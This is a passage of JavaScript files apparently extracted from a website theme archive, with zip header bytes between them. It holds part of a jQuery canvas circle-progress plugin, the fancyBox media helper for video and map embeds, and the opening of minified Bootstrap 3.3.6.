                    height: size
                }).appendTo($(this)).get(0);

            var context = canvas.getContext('2d');

            var dpr = window.devicePixelRatio;
            if ( dpr ) {
                var $canvas = $(canvas);
                $canvas.css('width', size);
                $canvas.css('height', size);
                $canvas.attr('width', size * dpr);
                $canvas.attr('height', size * dpr);

                context.scale(dpr, dpr);
            }

            var container = $(canvas).parent();
            var x = size / 2;
            var y = size / 2;
            var degrees = customSettingsObj.percent * 360.0;
            var radians = degrees * (Math.PI / 180);
            var radius = size / 2.5;
            var startAngle = 2.3 * Math.PI;
            var endAngle = 0;
            var counterClockwise = false;
            var curPerc = customSettingsObj.animationstep === 0.0 ? endPercent : 0.0;
            var curStep = Math.max(customSettingsObj.animationstep, 0.0);
            var circ = Math.PI * 2;
            var quart = Math.PI / 2;
            var type = '';
            var fireCallback = true;
            var additionalAngelPI = (customSettingsObj.startdegree / 180) * Math.PI;
            var animationDelay = customSettingsObj.delay;

            if ($(this).data('type') != undefined) {
                type = $(this).data('type');

                if (type == 'half') {
                    startAngle = 2.0 * Math.PI;
                    endAngle = 3.13;
                    circ = Math.PI;
                    quart = Math.PI / 0.996;
                }
            }

            if ($(this).data('type') != undefined) {
                type = $(this).data('type');

                if (type == 'angle') {
                    startAngle = 2.25 * Math.PI;
                    endAngle = 2.4;
                    circ = 1.53 + Math.PI;
                    quart = 0.73 + Math.PI / 0.996;
                }
            }

            /**
             * adds text to circle
             *
             * @param obj
             * @param cssClass
             * @param lineHeight
             */
            function addCircleText(obj, cssClass, lineHeight) {
                $("<span></span>")
                    .appendTo(obj)
                    .addClass(cssClass)
                    .html(text)
                    .prepend(icon)
                    .css({
                        'line-height': lineHeight + 'px',
                        'font-size': customSettingsObj.fontsize + 'px'
                    });
            }

            /**
             * adds info text to circle
             *
             * @param obj
             * @param factor
             */
            function addInfoText(obj, factor) {
                $('<span></span>')
                    .appendTo(obj)
                    .addClass('circle-info-half')
                    .css(
                    'line-height', (customSettingsObj.dimension * factor) + 'px'
                )
                    .text(info);
            }

            /**
             * checks which data attributes are defined
             * @param obj
             */
            function checkDataAttributes(obj) {
                $.each(customSettings, function (index, attribute) {
                    if (obj.data(attribute) != undefined) {
                        customSettingsObj[attribute] = obj.data(attribute);
                    } else {
                        customSettingsObj[attribute] = $(settings).attr(attribute);
                    }

                    if (attribute == 'fill' && obj.data('fill') != undefined) {
                        fill = true;
                    }
                });
            }

            /**
             * draw background circle
             */
            function bgrCircle () {
                context.clearRect(0, 0, canvas.width, canvas.height);

                context.beginPath();
                context.arc(x, y, radius, endAngle, startAngle, false);

                context.lineWidth = customSettingsObj.bordersize + 1;

                context.strokeStyle = customSettingsObj.bgcolor;
                context.stroke();

                if (customSettingsObj.fill) {
                    context.fillStyle = customSettingsObj.fill;
                    context.fill();
                }

            }

            /**
             * animate foreground circle
             * @param current
             */
            function animate(current) {

                bgrCircle ();
                context.beginPath();
                context.arc(x, y, radius, -(quart) + additionalAngelPI, ((circ) * current) - quart + additionalAngelPI, false);

                if (customSettingsObj.border == 'outline') {
                    context.lineWidth = customSettingsObj.width + customSettingsObj.bordersize;
                } else if (customSettingsObj.border == 'inline') {
                    context.lineWidth = customSettingsObj.width - customSettingsObj.bordersize;
                }

                context.strokeStyle = customSettingsObj.fgcolor;
                context.stroke();

                if (curPerc < endPercent) {
                    curPerc += curStep;
                    requestAnimationFrame(function () {
                        animate(Math.min(curPerc, endPercent) / 100);
                    }, obj);
                }

                if (curPerc == endPercent && fireCallback && typeof(options) != "undefined") {
                    if ($.isFunction(options.complete)) {
                        options.complete();

                        fireCallback = false;
                    }
                }
            }

            setTimeout(function () {
                animate(curPerc / 100);
            }, animationDelay);
        });
    };
}(jQuery));PK!F�+7"bizone/js/jquery.fancybox-media.jsnu&1i�/*!
 * Media helper for fancyBox
 * version: 1.0.6 (Fri, 14 Jun 2013)
 * @requires fancyBox v2.0 or later
 *
 * Usage:
 *     $(".fancybox").fancybox({
 *         helpers : {
 *             media: true
 *         }
 *     });
 *
 * Set custom URL parameters:
 *     $(".fancybox").fancybox({
 *         helpers : {
 *             media: {
 *                 youtube : {
 *                     params : {
 *                         autoplay : 0
 *                     }
 *                 }
 *             }
 *         }
 *     });
 *
 * Or:
 *     $(".fancybox").fancybox({,
 *         helpers : {
 *             media: true
 *         },
 *         youtube : {
 *             autoplay: 0
 *         }
 *     });
 *
 *  Supports:
 *
 *      Youtube
 *          http://www.youtube.com/watch?v=opj24KnzrWo
 *          http://www.youtube.com/embed/opj24KnzrWo
 *          http://youtu.be/opj24KnzrWo
 *			http://www.youtube-nocookie.com/embed/opj24KnzrWo
 *      Vimeo
 *          http://vimeo.com/40648169
 *          http://vimeo.com/channels/staffpicks/38843628
 *          http://vimeo.com/groups/surrealism/videos/36516384
 *          http://player.vimeo.com/video/45074303
 *      Metacafe
 *          http://www.metacafe.com/watch/7635964/dr_seuss_the_lorax_movie_trailer/
 *          http://www.metacafe.com/watch/7635964/
 *      Dailymotion
 *          http://www.dailymotion.com/video/xoytqh_dr-seuss-the-lorax-premiere_people
 *      Twitvid
 *          http://twitvid.com/QY7MD
 *      Twitpic
 *          http://twitpic.com/7p93st
 *      Instagram
 *          http://instagr.am/p/IejkuUGxQn/
 *          http://instagram.com/p/IejkuUGxQn/
 *      Google maps
 *          http://maps.google.com/maps?q=Eiffel+Tower,+Avenue+Gustave+Eiffel,+Paris,+France&t=h&z=17
 *          http://maps.google.com/?ll=48.857995,2.294297&spn=0.007666,0.021136&t=m&z=16
 *          http://maps.google.com/?ll=48.859463,2.292626&spn=0.000965,0.002642&t=m&z=19&layer=c&cbll=48.859524,2.292532&panoid=YJ0lq28OOy3VT2IqIuVY0g&cbp=12,151.58,,0,-15.56
 */
(function ($) {
	"use strict";

	//Shortcut for fancyBox object
	var F = $.fancybox,
		format = function( url, rez, params ) {
			params = params || '';

			if ( $.type( params ) === "object" ) {
				params = $.param(params, true);
			}

			$.each(rez, function(key, value) {
				url = url.replace( '$' + key, value || '' );
			});

			if (params.length) {
				url += ( url.indexOf('?') > 0 ? '&' : '?' ) + params;
			}

			return url;
		};

	//Add helper object
	F.helpers.media = {
		defaults : {
			youtube : {
				matcher : /(youtube\.com|youtu\.be|youtube-nocookie\.com)\/(watch\?v=|v\/|u\/|embed\/?)?(videoseries\?list=(.*)|[\w-]{11}|\?listType=(.*)&list=(.*)).*/i,
				params  : {
					autoplay    : 1,
					autohide    : 1,
					fs          : 1,
					rel         : 0,
					hd          : 1,
					wmode       : 'opaque',
					enablejsapi : 1
				},
				type : 'iframe',
				url  : '//www.youtube.com/embed/$3'
			},
			vimeo : {
				matcher : /(?:vimeo(?:pro)?.com)\/(?:[^\d]+)?(\d+)(?:.*)/,
				params  : {
					autoplay      : 1,
					hd            : 1,
					show_title    : 1,
					show_byline   : 1,
					show_portrait : 0,
					fullscreen    : 1
				},
				type : 'iframe',
				url  : '//player.vimeo.com/video/$1'
			},
			metacafe : {
				matcher : /metacafe.com\/(?:watch|fplayer)\/([\w\-]{1,10})/,
				params  : {
					autoPlay : 'yes'
				},
				type : 'swf',
				url  : function( rez, params, obj ) {
					obj.swf.flashVars = 'playerVars=' + $.param( params, true );

					return '//www.metacafe.com/fplayer/' + rez[1] + '/.swf';
				}
			},
			dailymotion : {
				matcher : /dailymotion.com\/video\/(.*)\/?(.*)/,
				params  : {
					additionalInfos : 0,
					autoStart : 1
				},
				type : 'swf',
				url  : '//www.dailymotion.com/swf/video/$1'
			},
			twitvid : {
				matcher : /twitvid\.com\/([a-zA-Z0-9_\-\?\=]+)/i,
				params  : {
					autoplay : 0
				},
				type : 'iframe',
				url  : '//www.twitvid.com/embed.php?guid=$1'
			},
			twitpic : {
				matcher : /twitpic\.com\/(?!(?:place|photos|events)\/)([a-zA-Z0-9\?\=\-]+)/i,
				type : 'image',
				url  : '//twitpic.com/show/full/$1/'
			},
			instagram : {
				matcher : /(instagr\.am|instagram\.com)\/p\/([a-zA-Z0-9_\-]+)\/?/i,
				type : 'image',
				url  : '//$1/p/$2/media/?size=l'
			},
			google_maps : {
				matcher : /maps\.google\.([a-z]{2,3}(\.[a-z]{2})?)\/(\?ll=|maps\?)(.*)/i,
				type : 'iframe',
				url  : function( rez ) {
					return '//maps.google.' + rez[1] + '/' + rez[3] + '' + rez[4] + '&output=' + (rez[4].indexOf('layer=c') > 0 ? 'svembed' : 'embed');
				}
			}
		},

		beforeLoad : function(opts, obj) {
			var url   = obj.href || '',
				type  = false,
				what,
				item,
				rez,
				params;

			for (what in opts) {
				if (opts.hasOwnProperty(what)) {
					item = opts[ what ];
					rez  = url.match( item.matcher );

					if (rez) {
						type   = item.type;
						params = $.extend(true, {}, item.params, obj[ what ] || ($.isPlainObject(opts[ what ]) ? opts[ what ].params : null));

						url = $.type( item.url ) === "function" ? item.url.call( this, rez, params, obj ) : format( item.url, rez, params );

						break;
					}
				}
			}

			if (type) {
				obj.href = url;
				obj.type = type;

				obj.autoHeight = false;
			}
		}
	};

}(jQuery));PK!�i�
�
�bizone/js/bootstrap.min.jsnu&1i�/*!
 * Bootstrap v3.3.6 (http://getbootstrap.com)
 * Copyright 2011-2015 Twitter, Inc.
 * Licensed under the MIT license
 */
if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>2)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 3")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){return a(b.target).is(this)?b.handleObj.handler.apply(this,arguments):void 0}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.6",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a(f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.6",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target);d.hasClass("btn")||(d=d.closest(".btn")),b.call(d,"toggle"),a(c.target).is('input[type="radio"]')||a(c.target).is('input[type="checkbox"]')||c.preventDefault()}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.6",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));return a>this.$items.length-1||0>a?void 0:this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){return this.sliding?void 0:this.slide("next")},c.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.6",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",f)))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.6",g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,40==c.which&&j<i.length-1&&j++,~j||(j=0),i.eq(j).trigger("focus")}}}};var h=a.fn.dropdown;a.fn.dropdown=d,a.fn.dropdown.Constructor=g,a.fn.dropdown.noConflict=function(){return a.fn.dropdown=h,this},a(document).on("click.bs.dropdown.data-api",c).on("click.bs.dropdown.data-api",".dropdown form",function(a){a.stopPropagation()}).on("click.bs.dropdown.data-api",f,g.prototype.toggle).on("keydown.bs.dropdown.data-api",f,g.prototype.keydown).on("keydown.bs.dropdown.data-api",".dropdown-menu",g.prototype.keydown)}(jQuery),+function(a){"use strict";function b(b,d){return this.each(function(){var e=a(this),f=e.data("bs.modal"),g=a.extend({},c.DEFAULTS,e.data(),"object"==typeof b&&b);f||e.data("bs.modal",f=new c(this,g)),"string"==typeof b?f[b](d):g.show&&f.show(d)})}var c=function(b,c){this.options=c,this.$body=a(document.body),this.$element=a(b),this.$dialog=this.$element.find(".modal-dialog"),this.$backdrop=null,this.isShown=null,this.originalBodyPad=null,this.scrollbarWidth=0,this.ignoreBackdropClick=!1,this.options.remote&&this.$element.find(".modal-content").load(this.options.remote,a.proxy(function(){this.$element.trigger("loaded.bs.modal")},this))};c.VERSION="3.3.6",c.TRANSITION_DURATION=300,c.BACKDROP_TRANSITION_DURATION=150,c.DEFAULTS={backdrop:!0,keyboard:!0,show:!0},c.prototype.toggle=function(a){return this.isShown?this.hide():this.show(a)},c.prototype.show=function(b){var d=this,e=a.Event("show.bs.modal",{relatedTarget:b});this.$element.trigger(e),this.isShown||e.isDefaultPrevented()||(this.isShown=!0,this.checkScrollbar(),this.setScrollbar(),this.$body.addClass("modal-open"),this.escape(),this.resize(),this.$element.on("click.dismiss.bs.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this)),this.$dialog.on("mousedown.dismiss.bs.modal",function(){d.$element.one("mouseup.dismiss.bs.modal",function(b){a(b.target).is(d.$element)&&(d.ignoreBackdropClick=!0)})}),this.backdrop(function(){var e=a.support.transition&&d.$element.hasClass("fade");d.$element.parent().length||d.$element.appendTo(d.$body),d.$element.show().scrollTop(0),d.adjustDialog(),e&&d.$element[0].offsetWidth,d.$element.addClass("in"),d.enforceFocus();var f=a.Event("shown.bs.modal",{relatedTarget:b});e?d.$dialog.one("bsTransitionEnd",function(){d.$element.trigger("focus").trigger(f)}).emulateTransitionEnd(c.TRANSITION_DURATION):d.$element.trigger("focus").trigger(f)}))},c.prototype.hide=function(b){b&&b.preventDefault(),b=a.Event("hide.bs.modal"),this.$element.trigger(b),this.isShown&&!b.isDefaultPrevented()&&(this.isShown=!1,this.escape(),this.resize(),a(document).off("focusin.bs.modal"),this.$element.removeClass("in").off("click.dismiss.bs.modal").off("mouseup.dismiss.bs.modal"),this.$dialog.off("mousedown.dismiss.bs.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one("bsTransitionEnd",a.proxy(this.hideModal,this)).emulateTransitionEnd(c.TRANSITION_DURATION):this.hideModal())},c.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.trigger("focus")},this))},c.prototype.escape=function(){this.isShown&&this.options.keyboard?this.$element.on("keydown.dismiss.bs.modal",a.proxy(function(a){27==a.which&&this.hide()},this)):this.isShown||this.$element.off("keydown.dismiss.bs.modal")},c.prototype.resize=function(){this.isShown?a(window).on("resize.bs.modal",a.proxy(this.handleUpdate,this)):a(window).off("resize.bs.modal")},c.prototype.hideModal=function(){var a=this;this.$element.hide(),this.backdrop(function(){a.$body.removeClass("modal-open"),a.resetAdjustments(),a.resetScrollbar(),a.$element.trigger("hidden.bs.modal")})},c.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove(),this.$backdrop=null},c.prototype.backdrop=function(b){var d=this,e=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var f=a.support.transition&&e;if(this.$backdrop=a(document.createElement("div")).addClass("modal-backdrop "+e).appendTo(this.$body),this.$element.on("click.dismiss.bs.modal",a.proxy(function(a){return this.ignoreBackdropClick?void(this.ignoreBackdropClick=!1):void(a.target===a.currentTarget&&("static"==this.options.backdrop?this.$element[0].focus():this.hide()))},this)),f&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),!b)return;f?this.$backdrop.one("bsTransitionEnd",b).emulateTransitionEnd(c.BACKDROP_TRANSITION_DURATION):b()}else if(!this.isShown&&this.$backdrop){this.$backdrop.removeClass("in");var g=function(){d.removeBackdrop(),b&&b()};a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one("bsTransitionEnd",g).emulateTransitionEnd(c.BACKDROP_TRANSITION_DURATION):g()}else b&&b()},c.prototype.handleUpdate=function(){this.adjustDialog()},c.prototype.adjustDialog=function(){var a=this.$element[0].scrollHeight>document.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth<a,this.scrollbarWidth=this.measureScrollbar()},c.prototype.setScrollbar=function(){var a=parseInt(this.$body.css("padding-right")||0,10);this.originalBodyPad=document.body.style.paddingRight||"",this.bodyIsOverflowing&&this.$body.css("padding-right",a+this.scrollbarWidth)},c.prototype.resetScrollbar=function(){this.$body.css("padding-right",this.originalBodyPad)},c.prototype.measureScrollbar=function(){var a=document.createElement("div");a.className="modal-scrollbar-measure",this.$body.append(a);var b=a.offsetWidth-a.clientWidth;return this.$body[0].removeChild(a),b};var d=a.fn.modal;a.fn.modal=b,a.fn.modal.Constructor=c,a.fn.modal.noConflict=function(){return a.fn.modal=d,this},a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(c){var d=a(this),e=d.attr("href"),f=a(d.attr("data-target")||e&&e.replace(/.*(?=#[^\s]+$)/,"")),g=f.data("bs.modal")?"toggle":a.extend({remote:!/#/.test(e)&&e},f.data(),d.data());d.is("a")&&c.preventDefault(),f.one("show.bs.modal",function(a){a.isDefaultPrevented()||f.one("hidden.bs.modal",function(){d.is(":visible")&&d.trigger("focus")})}),b.call(f,g,this)})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.tooltip"),f="object"==typeof b&&b;(e||!/destroy|hide/.test(b))&&(e||d.data("bs.tooltip",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.type=null,this.options=null,this.enabled=null,this.timeout=null,this.hoverState=null,this.$element=null,this.inState=null,this.init("tooltip",a,b)};c.VERSION="3.3.6",c.TRANSITION_DURATION=150,c.DEFAULTS={animation:!0,placement:"top",selector:!1,template:'<div class="tooltip" role="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var 